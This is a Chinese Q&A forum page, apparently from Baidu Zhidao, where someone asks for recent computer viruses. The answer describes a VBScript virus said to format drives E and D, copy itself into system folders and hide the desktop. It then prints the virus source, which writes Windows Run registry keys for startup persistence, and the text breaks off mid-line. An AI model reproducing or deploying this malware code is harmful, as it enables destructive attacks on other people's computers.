计算机目前比较新的病毒有那些?

来源:百度知道 编辑:UC知道 时间:2024/06/02 20:54:39
至少三种以上

win32.vbs.system parasite.A
系统寄生虫a变种
格式化E、D盘,复制多个副本入SYSTEM32、system中,并且禁止显示桌面(不使用注册表那么简单)代码如下:
on error resume next
Dim AutoRunProgram
Set AutoRunProgram = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name = "REG_SZ"
Key_Name = "Auto"
Key_data = "c:\windows\system32\System.vbs"
AutorunProgram.RegWrite regpath&Key_Name,Key_data,Type_Name
Dim Auto
Set Auto = WScript.CreateObject("WScript.shell")
RegPath ="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
Type_Name = "REG_SZ"
Key_Name = "System"
Key_data = "c:\windows\system32\SD78.look.vbs"
Auto.RegWrite regpath&Key_Name,Key_data,Type_Name
Dim RunProgram
Set RunProg